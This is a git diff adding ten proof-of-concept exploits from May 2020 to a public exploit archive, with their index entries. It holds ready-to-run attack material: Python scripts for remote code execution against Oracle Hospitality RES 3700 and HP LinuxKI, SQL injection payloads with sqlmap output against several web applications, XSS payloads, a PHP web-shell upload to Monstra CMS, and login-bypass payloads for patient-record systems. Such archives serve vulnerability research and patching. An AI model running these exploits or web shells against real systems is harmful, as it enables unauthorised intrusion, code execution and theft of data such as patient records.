diff --git a/exploits/hardware/webapps/48474.txt b/exploits/hardware/webapps/48474.txt new file mode 100644 index 000000000..697b85a95 --- /dev/null +++ b/exploits/hardware/webapps/48474.txt @@ -0,0 +1,22 @@ +# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection +# Exploit Author: jul10l1r4 (Julio Lira) +# Google Dork: N/A +# Date: 2020-05-16 +# Vendor Homepage: https://mikrotik.com +# Software Link: https://mikrotik.com/download +# Version: <= 1.2.3 +# Tested on: Debian 10 buster +# CVE: 2020-13118 +Description: SQL Injection found in check_community.php:49 + +$community = $_GET['community']; +$_SESSION['community'] = $community; +$query = "SELECT name from router where `community`=' +$community'"; + +PoC: + +http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI + +SQLmap using: +sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3 \ No newline at end of file diff --git a/exploits/java/webapps/48477.txt b/exploits/java/webapps/48477.txt new file mode 100644 index 000000000..a54ad349e --- /dev/null +++ b/exploits/java/webapps/48477.txt @@ -0,0 +1,65 @@ +# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution +# Date: 2019-10-01 +# Exploit Author: Walid Faour +# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/ +# Software Link: N/A (Available to customers) +# Version: <= v5.7 +# Tested on: Windows Server 2003 / Windows Server 2008 +# CVE : CVE-2019-3025 + +#!/usr/bin/env python + +#Author: Walid Faour +#Date: Aug. 2, 2019 +#Oracle Hospitality RES 3700 Release 4.9 Exploit + +import binascii +import requests + +print +print '-------------------------------------------------' +print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit' +print '-------------------------------------------------' +print + +IP = raw_input("Enter the IP address: ") +URL = "http://" + IP + ":50123" + +f = open("attacker-4.9.exe",'rb') +raw_payload = f.read() +payload_hex = binascii.hexlify(raw_payload) +f.close() + +g = open("attacker-4.9.job",'rb') +raw_task = g.read() +scheduled_task_hex = binascii.hexlify(raw_task) +g.close() + +def exploit_body(data,full_path): + body = ' \ + \ + MDSSYSUTILS \ + TransferFile \ + Session \ + \ + ' + full_path + ' \ + ' + full_path + ' \ + ' + data + ' \ + \ + \ + ' + return body +def exploit_headers(body): + headers = { + "Content-Type" : "text/xml", + "User-Agent" : "MDS POS Client", + "Host" : IP + ":50123", + "Content-Length" : str(len(body)), + "Connection" : "Keep-Alive" + } + return headers +print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...' +body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe") +body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job") +send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload)) +send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task)) \ No newline at end of file diff --git a/exploits/multiple/remote/48483.txt b/exploits/multiple/remote/48483.txt new file mode 100644 index 000000000..3db9cca33 --- /dev/null +++ b/exploits/multiple/remote/48483.txt @@ -0,0 +1,40 @@ +Exploit Title: HP LinuxKI 6.01 - Remote Command Injection +Date: 2020-05-17 +Exploit Author: Cody Winkler +Vendor Homepage: https://www.hpe.com/us/en/home.html +Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1 +Version: <= v6.0-1 +Tested on: LinuxKI Docker Image +CVE: CVE-2020-7209 + +#!/usr/bin/env python3 + +import requests +import argparse +import sys +import re + +def parse_options(): + + formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50) + parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter) + parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True) + parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True) + parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True) + args = parser.parse_args() + return args + +def main(args): + + host = args.host + port = args.port + cmd = args.cmd + path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd + rce = requests.get('http://' + host + ':' + port + path, verify=False) + output = rce.text + a, b = output.find('BEGIN'), output.find('END') + print(output[a+6:b]) + +if __name__ in "__main__": + args = parse_options() + main(args) \ No newline at end of file diff --git a/exploits/php/webapps/48475.txt b/exploits/php/webapps/48475.txt new file mode 100644 index 000000000..62bb82c2d --- /dev/null +++ b/exploits/php/webapps/48475.txt @@ -0,0 +1,91 @@ +# Exploit Title: Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection +# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang +# Google Dork: N/A +# Date: 2020-05-18 +# Vendor Homepage: https://connekthq.com/plugins/ajax-load-more/ +# Software Link: https://vi.wordpress.org/plugins/ajax-load-more/ +# Version: <= 5.3.1 +# Tested on: Ubuntu 18.04 + +Description: +A blind SQL injection vulnerability is present in Ajax load more. +$wpdb->get_var("SELECT repeaterDefault FROM " . $table_name . " WHERE name += '$n'"); + +POC: + +POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 +Host: lab-pwn.com +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 +Firefox/76.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://lab-pwn.com/wordpress/wp-admin/admin.php?page=ajax-load-more-repeaters +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 597 +Origin: http://lab-pwn.com +Connection: close +Cookie: +wordpress_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cab29a771b72eed2d65f02d50fd24ea85ae85f38d0fcc41abb56797fb8c7590a3; +wordpress_logged_in_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cb14c3363c0174d9eb93e2d2bbdd3627b293ea3e8fa8a1080325f62bb462938e2; +wp-settings-time-1=1589773793; PHPSESSID=0lsvlo9il6ibjiuflljl3qcub1 + +action=alm_update_repeater&value=%3Cli+%3C%3Fphp+if+(!has_post_thumbnail())+%7B+%3F%3E+class%3D%22no-img%22%3C%3Fphp+%7D+%3F%3E%3E%0A+++%3C%3Fphp+if+(+has_post_thumbnail()+)+%7B+the_post_thumbnail('alm-thumbnail')%3B+%7D%3F%3E%0A+++%3Ch3%3E%3Ca+href%3D%22%3C%3Fphp+the_permalink()%3B+%3F%3E%22+title%3D%22%3C%3Fphp+the_title()%3B+%3F%3E%22%3E%3C%3Fphp+the_title()%3B+%3F%3E%3C%2Fa%3E%3C%2Fh3%3E%0A+++%3Cp+class%3D%22entry-meta%22%3E%3C%3Fphp+the_time(%22F+d%2C+Y%22)%3B+%3F%3E%3C%2Fp%3E%0A+++%3C%3Fphp+the_excerpt()%3B+%3F%3E%0A%3C%2Fli%3E&repeater=' +or sleep(5)#&type=test&alias=&nonce=ae68ab8c91 + +SQL map: +custom injection marker ('*') found in option '--data'. Do you want to +process it? [Y/n/q] +[12:43:16] [INFO] resuming back-end DBMS 'mysql' +[12:43:16] [INFO] testing connection to the target URL +sqlmap resumed the following injection point(s) from stored session: +--- +Parameter: #1* ((custom) POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: action=alm_update_repeater&value=
  • class="no-img"> + +

    +

    + +
    • &repeater=-2104' OR 5557=5557-- dHBa#&type=test&alias=&nonce=ae68ab8c91 + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: action=alm_update_repeater&value=
  • class="no-img"> + +

    +

    + +
    • &repeater=' OR (SELECT 3214 FROM(SELECT +COUNT(*),CONCAT(0x716a6b7a71,(SELECT +(ELT(3214=3214,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- +AHqK#&type=test&alias=&nonce=ae68ab8c91 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: action=alm_update_repeater&value=
  • class="no-img"> + +

    +

    + +
    • &repeater=' OR SLEEP(5)-- pExJ#&type=test&alias=&nonce=ae68ab8c91 +--- +[12:43:17] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu +web application technology: Nginx +back-end DBMS: MySQL >= 5.0 \ No newline at end of file diff --git a/exploits/php/webapps/48476.txt b/exploits/php/webapps/48476.txt new file mode 100644 index 000000000..9c9047145 --- /dev/null +++ b/exploits/php/webapps/48476.txt @@ -0,0 +1,53 @@ +# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection +# Google Dork: N/A +# Date: 2020-05-16 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +#Description: +Online Examination System Project is vulnerable to +SQL injection via the 'eid' parameter on the account.php page. +# Create a new account and Move to the profile on top right side (click) +# vulnerable file : account.php +# vulnerable Parameter: eid +http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5 + +Parameter: eid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5 + + Type: UNION query + Title: Generic UNION query (NULL) - 5 columns + Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5 +--- +[INFO] the back-end DBMS is MySQL +web application technology: PHP, Apache 2.4.39, PHP 7.2.18 +back-end DBMS: MySQL >= 5.0 +# Proof of Concept: +http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5 + +http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 +GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge +Connection: keep-alive +Upgrade-Insecure-Requests: 1 + +q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 \ No newline at end of file diff --git a/exploits/php/webapps/48478.txt b/exploits/php/webapps/48478.txt new file mode 100644 index 000000000..ec9ec7cd1 --- /dev/null +++ b/exploits/php/webapps/48478.txt @@ -0,0 +1,25 @@ +# Exploit Title: forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting +# Date: 2020-05-15 +# Exploit Author: Daniel Ortiz +# Vendor Homepage: https://sourceforge.net/projects/forma/ +# Software link: https://sourceforge.net/projects/forma/files/latest/download +# Tested on: XAMPP for Linux 64bit 5.6.40-0 + + + +## 1 -Course Module +- Vulnerable parameter: course_code, course_name, course_box_descr, course_descr +- Payload: +- Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered. +- Privileges: It requires admin. +- Location: Admin Area > E-learning > Courses > Courses > Edit Course +- Endopoint: /formalms/appCore/index.php?r=alms/course/modcourse + + +## 1 -Profile Module +- Vulnerable parameter: Email +- Payload:
    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//\x3csVg/\x3e
    +- Details: There is some control on this field but can bypassed. +- Privileges: Do not requires admin or student account. +- Location: My Profile > Edit > Put the payload in Email field. +- Endpoint: /formalms/appLms/index.php?r=lms/profile/show&ap=saveinfo \ No newline at end of file diff --git a/exploits/php/webapps/48479.txt b/exploits/php/webapps/48479.txt new file mode 100644 index 000000000..31c8e8941 --- /dev/null +++ b/exploits/php/webapps/48479.txt @@ -0,0 +1,58 @@ +# Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload +# Google Dork: N/A +# Date: 2020-05-18 +# Exploit Author: Kishan Lal Choudhary +# Vendor Homepage: https://monstra.org +# Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip +# Version: 3.0.4 +# Tested on: Ubuntu + + + +1. Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/ + +2. Upload a one liner shell with php7 extenstion ie: shell.php7 + +#burp request +------------------------------------EOF----------------------------------------------------- +POST /monstra/admin/index.php?id=filesmanager HTTP/1.1 +Host: 192.168.2.5 +Content-Length: 548 +Cache-Control: max-age=0 +Origin: http://192.168.2.5 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager +Accept-Encoding: gzip, deflate +Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7 +Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328 +Connection: close + +------WebKitFormBoundarytRfyCkYq8NvztDBf +Content-Disposition: form-data; name="csrf" + +2e6ae2353998caa319aae262b113c6b3f17a9636 +------WebKitFormBoundarytRfyCkYq8NvztDBf +Content-Disposition: form-data; name="file"; filename="shell.php7" +Content-Type: application/octet-stream + +"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> + + +------WebKitFormBoundarytRfyCkYq8NvztDBf +Content-Disposition: form-data; name="upload_file" + +Upload +------WebKitFormBoundarytRfyCkYq8NvztDBf-- + +------------------------------------EOF----------------------------------------------------- + + +3. trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id + + + + +We have successfully got Remote Code execution \ No newline at end of file diff --git a/exploits/php/webapps/48480.txt b/exploits/php/webapps/48480.txt new file mode 100644 index 000000000..b58838686 --- /dev/null +++ b/exploits/php/webapps/48480.txt @@ -0,0 +1,47 @@ +# Exploit Title: online Chatting System 1.0 - 'id' SQL Injection +# Google Dork: N/A +# Date: 2020-05-17 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinechatting.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A +# my website: bkpatron.com + +# Discription: + The online Chatting System v1.0 application is vulnerable to SQL injection via the 'id' parameter on the chatroom.php page. +# vulnerable file : chatroom.php +http://localhost/chat_system/user/chatroom.php?id=5 + +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=5' AND 2674=2674 AND 'NdtA'='NdtA + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: id=5' AND (SELECT 8144 FROM(SELECT COUNT(*),CONCAT(0x7171717a71,(SELECT (ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIwS'='OIwS + + Type: time-based blind + Title: MySQL <= 5.0.11 AND time-based blind (heavy query) + Payload: id=5' AND 4648=BENCHMARK(5000000,MD5(0x67644874)) AND 'oSJd'='oSJd +--- +[INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.39, PHP 7.2.18 +back-end DBMS: MySQL >= 5.0 +# Proof of Concept: +http://localhost/chat_system/user/chatroom.php?id=5 + +GET /chat_system/user/chatroom.php?id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=mstb1630gvh0f97me7qdh5f7ke +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS \ No newline at end of file diff --git a/exploits/php/webapps/48481.txt b/exploits/php/webapps/48481.txt new file mode 100644 index 000000000..d89f58f52 --- /dev/null +++ b/exploits/php/webapps/48481.txt @@ -0,0 +1,64 @@ +# Exploit Title: Online Healthcare Patient Record Management System 1.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-05-18 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html +# Version: N/A +# Tested on: Kali Linux 2020.2 x64 +# CVE : N/A + + +The Online Healthcare Patient Record Management System suffers from multiple authentication bypass vulnerabilities: + +The login.php file allows a user to just supply ‘ or 1=1 – as a username and whatever password and bypass the authentication + +query("SELECT * FROM `user` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error()); + +The same happens with login.php for the admin area: + +query("SELECT *FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error()); + $fetch = $query->fetch_array(); + $valid = $query->num_rows; + if($valid > 0){ + $_SESSION['admin_id'] = $fetch['admin_id']; + header("location:home.php"); + + + +There is also an authentication bypass issue located in add_user.php: + +query("SELECT * FROM `user` WHERE `username` = '$username'") or die(mysqli_error()); + $f1 = $q1->fetch_array(); + $c1 = $q1->num_rows; + if($c1 > 0){ + echo ""; + }else{ + $conn->query("INSERT INTO `user` VALUES('', '$username', '$password', '$firstname', '$middlename', '$lastname', '$section')"); + header("location: user.php"); + } + } +If a request is made with the required parameters, any user can create an admin account (no authentication is required to do this). + +Finally, there are many SQL injection vulnerabilities (GET parameters directly passed to SQL queries), but those are authenticated \ No newline at end of file diff --git a/exploits/php/webapps/48482.txt b/exploits/php/webapps/48482.txt new file mode 100644 index 000000000..6a5d3bdb4 --- /dev/null +++ b/exploits/php/webapps/48482.txt @@ -0,0 +1,41 @@ +# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-05-16 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A +# my website: bkpatron.com + +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : admin/index.php || admin/login.php +# Parameter & Payload: '=''or' +# Proof of Concept: +http://localhost/onlinehealthcare/admin/login.php + +POST /onlinehealthcare/admin/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------293261110021842 +Content-Length: 356 +Referer: http://localhost/onlinehealthcare/admin/index.php +Cookie: _ga=GA1.1.1353584531.1478253768 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------293261110021842: undefined +Content-Disposition: form-data; name="username" +'=''or' +-----------------------------293261110021842 +Content-Disposition: form-data; name="password" + +'=''or' +-----------------------------293261110021842 +Content-Disposition: form-data; name="login" + + +-----------------------------293261110021842-- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d8db6e39e..6f0531bca 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18147,6 +18147,7 @@ id,file,description,date,author,type,platform,port 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows, 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple, 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple, +48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42703,3 +42704,12 @@ id,file,description,date,author,type,platform,port 48471,exploits/php/webapps/48471.txt,"E-Commerce System 1.0 - Unauthenticated Remote Code Execution",2020-05-14,SunCSR,webapps,php, 48472,exploits/php/webapps/48472.py,"vBulletin 5.6.1 - 'nodeId' SQL Injection",2020-05-15,Photubias,webapps,php, 48473,exploits/java/webapps/48473.txt,"ManageEngine Service Desk 10.0 - Cross-Site Scripting",2020-05-15,"Felipe Molina",webapps,java, +48474,exploits/hardware/webapps/48474.txt,"Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection",2020-05-18,jul10l1r4,webapps,hardware, +48475,exploits/php/webapps/48475.txt,"Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection",2020-05-18,"Nguyen Khang",webapps,php, +48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php, +48477,exploits/java/webapps/48477.txt,"Oracle Hospitality RES 3700 5.7 - Remote Code Execution",2020-05-18,"Walid Faour",webapps,java, +48478,exploits/php/webapps/48478.txt,"forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting",2020-05-18,"Daniel Ortiz",webapps,php, +48479,exploits/php/webapps/48479.txt,"Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload",2020-05-18,"Kishan Lal Choudhary",webapps,php, +48480,exploits/php/webapps/48480.txt,"online Chatting System 1.0 - 'id' SQL Injection",2020-05-18,BKpatron,webapps,php, +48481,exploits/php/webapps/48481.txt,"Online Healthcare Patient Record Management System 1.0 - Authentication Bypass",2020-05-18,"Daniel Monzón",webapps,php, +48482,exploits/php/webapps/48482.txt,"Online Healthcare management system 1.0 - Authentication Bypass",2020-05-18,BKpatron,webapps,php,